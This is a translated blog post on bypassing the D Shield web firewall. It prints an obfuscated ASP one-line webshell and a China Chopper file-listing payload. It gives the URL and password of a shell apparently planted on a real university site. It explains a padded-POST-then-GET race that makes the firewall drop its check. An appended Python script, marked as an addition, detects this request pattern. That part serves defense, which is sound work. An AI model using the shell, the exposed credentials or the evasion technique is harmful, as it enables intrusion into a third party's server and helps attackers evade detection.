D Shield bypass: a curious way to run dynamic code

Source: Internet
Author: User

D shield blocks the execution of dynamic script supplied as input, but it can be bypassed in a strange way.

One-line webshell address: http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp, password: z. An ordinary "kitchen knife" (China Chopper) client cannot connect to it.

The Code is as follows:
 

<%
Function decode(ByVal s, ByVal key)
    For i = 1 To Len(s) Step 2
        c = Mid(s, i, 2)
        k = (i + 1) / 2 Mod Len(key) + 1
        p = Mid(key, k, 1)
        If IsNumeric(Mid(s, i, 1)) Then
            decode = decode & Chr(("&H" & c) - p)
        Else
            decode = decode & Chr("&H" & c & Mid(s, i + 2, 2))
            i = i + 2
        End If
    Next
End Function
Execute decode("4A7A6C6C7A766C3169676A7869672F7B6A737C6E78762F2B7F2430357767787E6A757B31276D6C82272B3032","9527")
%>





That is, the input parameter z is decoded by the decode function and executed.

For example, encode Response.Write(2333333+1) and run the resulting code (526573706F6E73652E577269746528323333333333332B3129).
 



However, when we encoded the data packet of the "kitchen knife" (China Chopper) client, the code was intercepted every time:

Code before encoding:
 

Response.Write("->|"):Dim RR:RR=decode(Request("k1"),Request("key")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name:Next:For Each L in FO.files:Response.Write L.Name:Next:End If:Response.Write("|<-"):Response.End



After encoding:
 



 





The data packet contains no keywords, so D shield's interception clearly does not happen during transmission. Instead, D shield detects calls to certain sensitive methods, such as FSO, while the code is being decoded and executed.

However, when I do not execute the code dynamically (it is written to the Web directory of the server instead), the results are returned successfully.
 





Going over the whole process, we can conclude that D shield checks the final content of the dynamic code (no matter how the user [encrypts] it). We can also conclude that such detection consumes a certain amount of system resources. So how is that resource consumption kept to a minimum? The final test showed that D shield checks every request from a user, but when it starts checking a subsequent request it terminates the checks on all previous requests.



This leads to a bypass. We make the dynamic code in the first request large enough that detection takes some time. While the dynamic code in the first request has not yet been detected, we send the second request (a GET of the site URL that contains no dynamic code), and the check on the first request is then ended. (Note: I add a lot of 0A [line feed] before the dynamic code to use up detection time.)



First request:

http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp

POST
 

z=0A0A...[many 0A0A omitted]...[value]&key=00000&k1=[value]





Second request: a direct GET request to http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp

Direct POST sending is intercepted:
 





Using the above method, the dynamic code is successfully executed:
 


 

 


 

 

Solution:

Logic
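
An added detection example (not from the original article): it flags the request pattern described above, a POST to an .asp script whose hex-encoded parameter starts with a long run of 0A padding, and records whether a GET to the same script follows from the same client. It assumes request bodies are logged; the sample records, paths, threshold and time window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

MIN_PAD_PAIRS = 256             # assumed threshold, tune per site
WINDOW = timedelta(seconds=2)   # assumed gap allowed before the follow-up GET
HEX_ONLY = re.compile(r"[0-9A-Fa-f]+")
LEADING_PAD = re.compile(r"(?:0A)+", re.I)

# Constructed sample records: (time, client, method, path, body)
SAMPLE = [
    ("2024-01-01T10:00:00.000", "203.0.113.5", "POST", "/uploads/a.asp",
     "z=" + "0A" * 4000 + "5265&key=00000&k1=433A"),
    ("2024-01-01T10:00:00.050", "203.0.113.5", "GET", "/uploads/a.asp", ""),
    ("2024-01-01T10:05:00.000", "198.51.100.7", "POST", "/login.asp", "user=alice&pin=0A0A"),
    ("2024-01-01T10:05:03.000", "198.51.100.7", "GET", "/login.asp", ""),
    ("2024-01-01T10:07:00.000", "192.0.2.9", "POST", "/uploads/a.asp",
     "z=" + "0A" * 300 + "41&key=00000"),
]

def pad_pairs(body):
    """Largest leading run of '0A' pairs found in any all-hex form value."""
    best = 0
    for _, value in parse_qsl(body, keep_blank_values=True):
        if HEX_ONLY.fullmatch(value):
            m = LEADING_PAD.match(value)
            if m:
                best = max(best, len(m.group()) // 2)
    return best

def detect(records):
    """Return (client, path, pad_pairs, followed_by_get) for each padded POST."""
    rows = sorted((datetime.fromisoformat(t), c, m, p, b) for t, c, m, p, b in records)
    alerts = []
    for i, (t, client, method, path, body) in enumerate(rows):
        if method != "POST" or not path.lower().endswith(".asp"):
            continue
        n = pad_pairs(body)
        if n < MIN_PAD_PAIRS:
            continue
        # A quick GET of the same script by the same client matches the second request.
        followed = any(m2 == "GET" and c2 == client and p2 == path and t2 - t <= WINDOW
                       for t2, c2, m2, p2, _ in rows[i + 1:])
        alerts.append((client, path, n, followed))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

A padded POST with no follow-up GET is still reported, with the last field set to False, since the padding alone is unusual for form data.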
